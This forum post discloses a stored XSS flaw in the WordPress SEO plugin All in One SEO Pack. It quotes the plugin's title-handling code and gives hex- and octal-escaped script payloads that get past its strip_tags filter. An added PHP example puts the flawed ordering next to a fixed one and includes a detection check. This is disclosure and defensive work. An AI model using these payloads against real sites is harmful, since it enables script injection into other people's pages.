jackal posted on 2012-12-29 17:16
A few days ago I was helping a friend update his blog and took the chance to look at his site's security; I tested the WordPress SEO plugin.
http://wordpress.org/extend/plugins/ (Most Popular): All in One SEO Pack 1.6.15.3, downloaded 13,210,199 times
The SEO plugin lets you configure a separate Title, Description and Keywords for each post.
aioseop.class.php
The admin side mainly submits Title, Description and Keywords.
function wp_head() filters the double quotes out of Description and Keywords, and I couldn't think of a way to exploit those, so the focus is on how Title is used.
<?php
function replace_title($content, $title) {
    // Strip HTML tags; this looks safe...
    $title = trim(strip_tags($title));
    $title_tag_start = "<title>";
    $title_tag_end = "</title>";
    $len_start = strlen($title_tag_start);
    $len_end = strlen($title_tag_end);
    // ...but the unescaping here is where it goes wrong
    $title = stripcslashes(trim($title));
    $start = strpos($content, $title_tag_start);
    $end = strpos($content, $title_tag_end);
    $title_start = $start;
    $title_end = $end;
    $orig_title = $title;
    if ($start && $end) {
        $header = substr($content, 0, $start + $len_start) . $title . substr($content, $end);
    } else {
        // this breaks some sitemap plugins (like wpg2)
        //$header = $content . "<title>$title</title>";
        $header = $content;
    }
    return $header;
}

// Test harness: each assignment replaces the previous one, so the last payload is the one echoed.
$content = '<html><title>mytitle</title><body>mybody</body></html>';
$title = 'eviltitle';
$title = '<del>eviltitle</del>';
$title = '\x3c/title>\x3cscript>alert("xss");\x3c/script>';
$title = '\74/title>\74script>alert("xss");\74/script>';
echo replace_title($content, $title);
?>
http://php.net/manual/zh/function.stripcslashes.php
Returns the unescaped string. Recognizes C-like \n, \r, ..., octal and hexadecimal representations.
So we just submit:
\x3c/title>\x3cscript>alert("xss");\x3c/script>
\74/title>\74script>alert("xss");\74/script>
The XSS fires, as shown in the screenshot:
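To make the ordering problem concrete, here is an added example (my own code, not the plugin's) that puts the plugin's strip_tags-then-stripcslashes sequence next to an ordering that keeps the title safe, plus a small check a site owner could run over stored titles. The function names vulnerable_title, safe_title and decodes_to_markup are my own; the sample titles are constructed to match the payloads above.

```php
<?php
// Added example (not the plugin's code): strip_tags() runs before stripcslashes(),
// so a title made only of C-style escapes carries no tags when it is stripped,
// and the "<" and ">" only appear afterwards, when the text is already trusted.

function vulnerable_title($title) {
    $title = trim(strip_tags($title));   // nothing to strip yet: input has no "<"
    return stripcslashes(trim($title));  // \x3c / \74 become "<" here, tags reappear
}

function safe_title($title) {
    // Decode first, so every later step sees the text that will actually be output.
    $title = stripcslashes(trim($title));
    $title = trim(strip_tags($title));
    // The <title> element is RCDATA: "</title>" inside it still closes the element,
    // so the text must be entity-encoded for this context (WordPress has esc_html()).
    return htmlspecialchars($title, ENT_QUOTES, 'UTF-8');
}

// Detection check: does C-style unescaping introduce "<" or ">" that the raw
// stored title did not contain? A legitimate title almost never needs that.
function decodes_to_markup($title) {
    $decoded = stripcslashes($title);
    $raw_has_markup = strpos($title, '<') !== false || strpos($title, '>') !== false;
    $dec_has_markup = strpos($decoded, '<') !== false || strpos($decoded, '>') !== false;
    return $dec_has_markup && !$raw_has_markup;
}

// Constructed sample titles; single quotes keep the backslashes literal, as a POST body would.
$samples = [
    'My ordinary title',
    '<del>eviltitle</del>',
    '\x3c/title>\x3cscript>alert("xss");\x3c/script>',
    '\74/title>\74script>alert("xss");\74/script>',
];

foreach ($samples as $s) {
    printf("input:      %s\nvulnerable: %s\nsafe:       %s\nflagged:    %s\n\n",
        $s,
        vulnerable_title($s),
        safe_title($s),
        decodes_to_markup($s) ? 'yes' : 'no');
}
?>
```

For the two escape-sequence payloads, vulnerable_title() returns a string containing a literal </title><script>, while safe_title() strips the decoded tags and entity-encodes what remains, and decodes_to_markup() flags both; the first two samples are not flagged, since any "<" in them is already visible before decoding.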
Three things that make this rather weak:
1. The plugin has to be installed. -_-||
2. You need at least the permissions of a post contributor.
3. When the administrator views the post list in the backend, the crafted title is shown directly (output through htmlspecialchars), so it is easy to spot.